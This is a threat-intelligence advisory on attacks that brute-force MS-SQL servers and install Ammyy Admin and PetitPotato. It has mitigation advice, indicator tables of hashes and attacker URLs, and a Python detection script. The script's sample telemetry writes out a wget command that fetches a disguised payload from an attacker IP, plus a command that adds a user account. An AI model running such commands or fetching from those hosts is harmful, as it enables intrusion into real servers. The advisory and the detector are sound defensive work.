
Case of Attacks Targeting MS-SQL Servers to Install Ammyy Admin

Severity: Medium
Published: Tue Apr 22 2025 (04/22/2025, 16:40:57 UTC)
Source: AlienVault OTX General

Description

A series of attacks targeting poorly managed MS-SQL servers have been identified, involving the installation of Ammyy Admin, a remote control tool. The attackers exploit vulnerable servers, execute commands to gather system information, and use WGet to install additional malware. The installed malware includes Ammyy Admin (mscorsvw.exe), its settings file (settings3.bin), and PetitPotato (p.ax). The attackers utilize an old version of Ammyy Admin (v3.10) and employ known exploitation methods to gain remote control. They also use PetitPotato for privilege escalation, adding new users and activating RDP services. To prevent such attacks, administrators are advised to use strong passwords, update software regularly, and implement security measures like firewalls.

AI-Powered Analysis

AI analysis last updated: 06/22/2025, 04:08:09 UTC

Technical Analysis

This threat involves a series of attacks targeting poorly managed Microsoft SQL (MS-SQL) servers. Attackers exploit weak security configurations, primarily through brute force and dictionary attacks against MS-SQL authentication, to gain initial access. Once access is obtained, they execute commands to gather system information (technique T1082) and use WGet to download and install additional malware components. The primary malware installed is an outdated version (v3.10) of Ammyy Admin, a legitimate remote control tool, disguised as 'mscorsvw.exe' alongside its configuration file 'settings3.bin'. Additionally, the attackers deploy PetitPotato (p.ax), a known privilege escalation tool that exploits Windows token impersonation vulnerabilities to elevate privileges (technique T1068). With escalated privileges, the attackers create new user accounts and enable Remote Desktop Protocol (RDP) services to maintain persistent remote access. The attack chain leverages multiple MITRE ATT&CK techniques including brute force (T1110), remote service exploitation (T1021), command execution (T1059), and persistence via new user creation (T1136). The use of an outdated Ammyy Admin version suggests reliance on known vulnerabilities or lack of detection signatures. The attackers exploit common misconfigurations such as weak passwords and unpatched MS-SQL servers, emphasizing the importance of proper server hardening. No specific affected product versions are listed, indicating the attack targets any MS-SQL server with weak security. There are no known exploits in the wild beyond these observed attacks, and no CVSS score is assigned. The threat is rated medium severity by the source, reflecting moderate impact potential and exploitation complexity.

Potential Impact

For European organizations, the impact of this threat can be significant, especially for entities relying on MS-SQL servers for critical business operations. Successful exploitation can lead to unauthorized remote control of servers, enabling attackers to exfiltrate sensitive data, manipulate databases, or use the compromised infrastructure as a foothold for lateral movement within the network. The installation of Ammyy Admin allows persistent remote access, increasing the risk of prolonged undetected compromise. Privilege escalation via PetitPotato further exacerbates the threat by granting attackers administrative control, which can lead to disabling security controls, deploying ransomware, or establishing backdoors. Organizations in sectors such as finance, healthcare, manufacturing, and government are particularly at risk due to their reliance on MS-SQL databases and the sensitivity of stored data. Additionally, enabling RDP services and adding new users can facilitate further attacks or insider threats. The medium severity rating reflects that while the attack requires some initial misconfiguration (weak passwords, unpatched servers), the consequences can be severe if exploited. The threat also poses reputational and regulatory risks under GDPR if personal data is compromised. Given the use of legitimate tools like Ammyy Admin, detection may be challenging, increasing dwell time and potential damage.

Mitigation Recommendations

To mitigate this threat effectively, European organizations should implement the following specific measures beyond generic advice:

1) Enforce strong, complex passwords and implement account lockout policies on MS-SQL servers to prevent brute force and dictionary attacks.
2) Disable or restrict remote access protocols such as RDP unless absolutely necessary, and enforce network-level authentication and multi-factor authentication (MFA) for remote connections.
3) Regularly audit MS-SQL server configurations and patch all known vulnerabilities promptly, including underlying Windows OS patches that address privilege escalation vectors exploited by PetitPotato.
4) Monitor for unusual process executions and network connections, specifically looking for the presence of 'mscorsvw.exe' in unexpected contexts and the download of files via WGet or similar tools.
5) Implement application whitelisting to prevent unauthorized execution of tools like Ammyy Admin and PetitPotato.
6) Conduct regular user account reviews to detect unauthorized additions and disable unused accounts.
7) Employ network segmentation to isolate database servers from general user networks and limit lateral movement.
8) Use endpoint detection and response (EDR) solutions capable of detecting privilege escalation and remote control tool behaviors.
9) Educate administrators on the risks of using outdated remote control software versions and encourage the use of secure, updated alternatives.
10) Establish comprehensive logging and alerting for MS-SQL authentication failures and privilege escalation attempts to enable rapid incident response.
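The detection logic behind recommendations 4, 6 and 10, and the indicator matching that the hash and URL tables below allow, as an added example that is not part of the OTX pulse or the ASEC report. It runs a handful of rules over constructed sample telemetry (Sysmon-style process-creation records with pid/ppid, plus MS-SQL failed-login records): a known-bad hash, an mscorsvw.exe outside the .NET Framework directories where the genuine .NET Native Image Service lives, an advisory host in a command line, a downloader whose process ancestry leads back to sqlservr.exe, a `net ... /add` account addition, and a sliding-window brute-force count. The event field names, the 10-failures-in-60-seconds threshold, the legitimate-path pattern and the "similar tools" beyond wget are analyst assumptions; the hashes and hosts are copied from the page's IoC tables.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta
from ntpath import basename  # splits Windows paths correctly on any host OS

# Indicators copied from the advisory's IoC tables (hashes lower-cased, hosts taken from the URLs).
IOC_HASHES = {
    "1c9c3b4a2753ecab833621701e1b492c", "55f4a1393e2edafea92d7ebab09c92d6",
    "753f5e2fc5bdbc9b2175913d3b883580", "b3b9eb83af47770dbb8e86f95afe9634",
    "1af757d777b664e6048e4001f45c7e004ab65f47",
    "c0f17c77a25475496f23c6296ce1043aaed00f83",
    "9d019136cb08075cc3c25e23ccff919b16eb79060c45ceba1004edc96980416d",
    "ce226d9a3a2c25c4d8f8f333aede73692f76be51423948084eba360b2fed2547",
}
IOC_HOSTS = {"1.220.228.82", "110.45.186.8"}

# Assumption: the genuine mscorsvw.exe (.NET Native Image Service) lives under the .NET
# Framework directories; an mscorsvw.exe anywhere else is treated as the disguised Ammyy Admin.
LEGIT_MSCORSVW = re.compile(
    r"^[a-z]:\\windows\\microsoft\.net\\framework(64)?\\v[0-9.]+\\mscorsvw\.exe$", re.I)

# wget is what the advisory observed; the others are analyst-chosen "similar tools".
DOWNLOADERS = {"wget.exe", "curl.exe", "certutil.exe", "bitsadmin.exe"}

BRUTE_FORCE_THRESHOLD = 10                  # failed logins from one source ...
BRUTE_FORCE_WINDOW = timedelta(seconds=60)  # ... inside this window (tunable assumptions)


def _ts(s):
    return datetime.strptime(s, "%Y-%m-%d %H:%M:%S")


def detect(events):
    """Run the rules over a chronological list of event dicts; return (rule, detail) alerts."""
    alerts = []
    procs = {}                     # pid -> (image name, ppid), for process-lineage lookups
    failures = defaultdict(deque)  # source IP -> timestamps of recent failed SQL logins

    def has_ancestor(pid, wanted):
        seen = set()
        while pid in procs and pid not in seen:
            seen.add(pid)
            name, pid = procs[pid]
            if name == wanted:
                return True
        return False

    for ev in events:
        if ev["type"] == "process":
            image = ev["image"]
            name = basename(image).lower()
            cmd = ev.get("cmdline", "")
            procs[ev["pid"]] = (name, ev["ppid"])
            if ev.get("hash", "").lower() in IOC_HASHES:
                alerts.append(("ioc_hash", f"{image} {ev['hash']}"))
            if name == "mscorsvw.exe" and not LEGIT_MSCORSVW.match(image):
                alerts.append(("mscorsvw_unexpected_path", image))
            if any(host in cmd for host in IOC_HOSTS):
                alerts.append(("ioc_host_in_cmdline", cmd))
            if name in DOWNLOADERS and has_ancestor(ev["ppid"], "sqlservr.exe"):
                alerts.append(("downloader_under_sqlservr", cmd))
            if name in {"net.exe", "net1.exe"} and "/add" in cmd.lower():
                alerts.append(("account_or_group_add", cmd))
        elif ev["type"] == "sql_login_failed":
            q = failures[ev["src"]]
            q.append(_ts(ev["ts"]))
            while q and q[-1] - q[0] > BRUTE_FORCE_WINDOW:  # drop failures outside the window
                q.popleft()
            if len(q) == BRUTE_FORCE_THRESHOLD:  # fires when the count reaches the threshold
                alerts.append(("sql_brute_force",
                               f"{ev['src']}: {len(q)} failures in {BRUTE_FORCE_WINDOW.seconds}s"))
    return alerts


# Constructed sample telemetry (not from the report): a failed-login burst, then the process
# chain sqlservr.exe -> cmd.exe -> wget.exe that OS commands run through the SQL service leave.
SAMPLE_EVENTS = [
    *[{"type": "sql_login_failed", "ts": f"2025-04-22 16:40:{i:02d}", "src": "203.0.113.7", "user": "sa"}
      for i in range(0, 36, 3)],  # 12 failures in 33 seconds
    {"type": "process", "pid": 1000, "ppid": 600, "cmdline": "sqlservr.exe",
     "image": r"C:\Program Files\Microsoft SQL Server\MSSQL15.MSSQLSERVER\MSSQL\Binn\sqlservr.exe"},
    {"type": "process", "pid": 1010, "ppid": 1000, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd.exe /c wget http://110.45.186.8/mscorsvw.log -O C:\Users\Public\mscorsvw.exe"},
    {"type": "process", "pid": 1020, "ppid": 1010, "image": r"C:\Windows\Temp\wget.exe",
     "cmdline": r"wget http://110.45.186.8/mscorsvw.log -O C:\Users\Public\mscorsvw.exe"},
    {"type": "process", "pid": 1030, "ppid": 1010, "image": r"C:\Users\Public\mscorsvw.exe",
     "cmdline": "mscorsvw.exe", "hash": "1af757d777b664e6048e4001f45c7e004ab65f47"},  # advisory hash
    {"type": "process", "pid": 1040, "ppid": 800, "cmdline": "mscorsvw.exe",
     "image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe"},  # genuine; no alert
    {"type": "process", "pid": 1050, "ppid": 1010, "image": r"C:\Windows\System32\net.exe",
     "cmdline": "net user helpdesk2 <password> /add"},
]

if __name__ == "__main__":
    for rule, detail in detect(SAMPLE_EVENTS):
        print(f"[{rule}] {detail}")
```

Two design points: the lineage walk makes the downloader rule fire only when sqlservr.exe is an ancestor, so ordinary wget or curl use elsewhere on the host stays quiet; and the path allow-list for mscorsvw.exe means the genuine .NET service does not alert, which is what keeps rule 4 usable on a real server. Note that the cmd.exe wrapper and the wget child both carry the advisory host in their command lines, so the host rule fires twice for one download.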


Technical Details

Author: AlienVault
TLP: white
References: https://asec.ahnlab.com/en/87606
Adversary: (not specified)
Pulse Id: 6807c69906b162a197133ee9

Indicators of Compromise

Hash

Value (hash type inferred from length)
1c9c3b4a2753ecab833621701e1b492c (32 hex digits, MD5-length)
55f4a1393e2edafea92d7ebab09c92d6 (32 hex digits, MD5-length)
753f5e2fc5bdbc9b2175913d3b883580 (32 hex digits, MD5-length)
b3b9eb83af47770dbb8e86f95afe9634 (32 hex digits, MD5-length)
1af757d777b664e6048e4001f45c7e004ab65f47 (40 hex digits, SHA-1-length)
c0f17c77a25475496f23c6296ce1043aaed00f83 (40 hex digits, SHA-1-length)
9d019136cb08075cc3c25e23ccff919b16eb79060c45ceba1004edc96980416d (64 hex digits, SHA-256-length)
ce226d9a3a2c25c4d8f8f333aede73692f76be51423948084eba360b2fed2547 (64 hex digits, SHA-256-length)

Url

Value
http://1.220.228.82/mscorsvw1.log
http://1.220.228.82/settings3.bin
http://110.45.186.8/aa_v3_protected.exe
http://110.45.186.8/mscorsvw.log

Threat ID: 682f4bb70acd01a2492622b7

Added to database: 5/22/2025, 4:07:19 PM

Last enriched: 6/22/2025, 4:08:09 AM

Last updated: 8/11/2025, 6:45:35 AM
